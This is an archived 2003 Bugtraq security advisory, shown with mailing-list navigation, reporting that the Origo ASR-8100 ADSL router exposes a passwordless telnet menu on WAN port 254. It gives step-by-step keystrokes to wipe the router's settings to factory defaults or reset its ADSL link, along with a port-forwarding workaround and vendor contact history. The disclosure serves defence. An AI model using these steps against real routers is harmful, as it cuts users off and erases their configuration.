Origo ASR-8100 ADSL router remote factory reset

From: Theo Markettos (theo_at_markettos.org.uk)
Date: 10/12/03

  • Next message: The-Insider: "eMule 2.2 [0.29c] - Web Control Panel - DOS(Denial Of Service)"
    Date: Sun, 12 Oct 2003 19:03:43 +0100
    To: bugtraq@securityfocus.com
    
    
    

    Vulnerable device
    -----------------

    Origo ASR-8100 ADSL router
    Firmware ETHADSL_USB_110502_REL10_S
    Customer Software Version 110502_REL10_S
    ADSL Showtime Firmware Version: 3.21
    device based on Conexant CX82310-14 chipset

    Vulnerability: Remote ADSL reset and permanent denial of service attack
    -----------------------------------------------------------------------

    The following device is able to be remotely reset to factory settings,
    allowing a permanent denial of service attack until reconfigured manually by
    an operator. The attack only takes place after the device is reset - which
    may be some time after it has been performed. PPP authentication
    information
    is lost on reset to factory settings, so it is most likely that the device
    will be unable to establish a WAN link after reset.

    The ADSL link can also be remotely reset, causing temporary DoS and (if DHCP
    is used) its IP address to be changed.

    Attack overview
    ---------------

    A telnet-style configuration interface is left open to WAN interface on port
    254, without a password being set. This menu system is very easily driven
    by
    a remote attacker.

    A full exploit is given below.

    Workaround
    ----------

    Forwarding external port 254 to an internal port that is unused prevents
    access to the configuration interface.

    With the web configuration interface at http://router-ip/doc/advance.htm
    click on Configuration: Virtual server
    Enter a new entry:
    Public port: 254
    Private port: 9876
    TCP
    Host IP address: 127.0.0.1
    Click 'Add this setting', then do Configuration: Save Settings/Reboot and
    click 'Save & Reboot'

    Exploit details
    ---------------

    From any Internet connected host:

    telnet <router global IP address> 254
    Returns a menu:
    01/01/99 CONEXANT SYSTEMS, INC.
    00:04:10
                    ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21
                       
    You are prompted for a LOGIN PASSWORD>
    Just press return
    Brings up MAIN MENU
      1. SYSTEM STATUS AND CONFIGURATION
      2. ADSL MENU
      
      4. REMOTE LOGON
      
    Press 1 - get to SYSTEM STATUS AND CONFIGURATION
      1. SYSTEM INFORMATION
      2. SYSTEM CONFIGURATION
    Press 2 - get to SYSTEM CONFIGURATION
      1. CHANGE SYSTEM TIME
      2. CHANGE SYSTEM DATE
      3. CHANGE PASSWORD
      4. FACTORY DEFAULT CONFIGURATION

    Type 1 hh:mm:ss to reset the system time
    Type 2 dd/mm/yy to reset the system date
    (Option 3 doesn't seem to work)

    Type 4: Prompt: This will reset all the configurations and the ADSL modem.
    Are you sure?(Y/N)

    Type Y: Message: NVRAM updated

    This does not reset the ADSL modem, only clears the NVRAM. This takes
    effect
    the next time the modem is reset: the admin password is reset to that
    printed
    in the documentation, and the ADSL username/password are reset, meaning the
    connection is down permanently until a human sets them up again. Any other
    settings (security etc) are also lost.

    From main menu, type 2 to get to ADSL MENU
      1. ADSL PERFORMANCE STATUS
      2. 24 HOUR ADSL PERFORMANCE HISTORY
      3. 7 DAY ADSL PERFORMANCE HISTORY
      4. ADSL ALARM HISTORY
      5. ADSL TRANSCEIVER CONFIGURATION MENU
      6. ADSL LINK RESET

    Type 6: Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
    Type Y. The ADSL link is reset and a new WAN IP address is requested by
    DHCP (if the ISP uses it).

    Vendor notification
    -------------------

    UK support for Vendor (support@adsltech.com) was notified on 30th August
    2003 - entirety of reply message was 'Thanks a lot'. Vendor doesn't
    advertise an email address so were notified via web form on that date - no
    response received. To date the vendor has not advertised any patches or new
    firmware.

    -- 
    Theo Markettos                 theo@markettos.org.uk
    Clare Hall, Cambridge          theom@chiark.greenend.org.uk
    CB3 9AL, UK                    http://www.markettos.org.uk/
    
    



  • Next message: The-Insider: "eMule 2.2 [0.29c] - Web Control Panel - DOS(Denial Of Service)"

    Relevant Pages

    • [NEWS] Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Origo ASR-8100 ADSL device can be remotely reset to factory settings, ... A telnet-style configuration interface is left open to the WAN interface ...
      (Securiteam)
    • Re: More problems/router settings
      ... Router OK, you can also have a look at the Router's Admin/Status ... to see what it's saying about the state of the ADSL Line. ... need to have the right PPoE/PPPoA Settings & the right VPI & VCI ... By Pressing & *Holding* the ReSet Button at the back of it, ...
      (uk.people.silversurfers)
    • Re: three mini-rants
      ... is instantly fixed by a reset of the ADSL box. ... It may be chipset, ... luser contention. ... This presumably isn't UI as who would use ADSL for proper connectivity?, ...
      (alt.sysadmin.recovery)
    • 2wire Router Bt branded problems
      ... I've used this router for about a week and it's unable to detect the ADSL ... almost immediately I changed the mtu (for a talktalk ADSL connection). ... (Reset to defaults etc, still the same) ...
      (uk.telecom)
    • Re: Mixed clocked/combinatorial coding styles
      ... I wouldn't use a device input that performs a device wide reset ... as a clock input had better be able to cope with the clock shutting ... The outputs of the shift registers become the reset signals ... requirement to go active at the end of configuration, ...
      (comp.lang.vhdl)